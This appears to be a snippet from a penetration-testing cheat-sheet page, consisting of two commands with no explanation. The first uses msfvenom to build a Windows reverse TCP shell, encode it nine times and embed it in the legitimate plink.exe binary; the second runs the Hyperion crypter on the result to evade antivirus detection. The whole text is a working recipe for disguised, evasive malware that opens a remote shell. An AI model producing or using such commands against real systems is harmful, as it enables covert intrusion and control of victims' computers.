msfvenom -p windows/shell_reverse_tcp LHOST=$VICTIM_IP LPORT=$VICTIM_PORT \ -f exe -e x86/shikata_ga_nai -i 9 \ -x /usr/share/windows-binaries/plink.exe \ -o encoded_shell.exe
wine hyperion.exe ../encoded_shell.exe ../crypted.exe
Last updated 5 years ago
Was this helpful?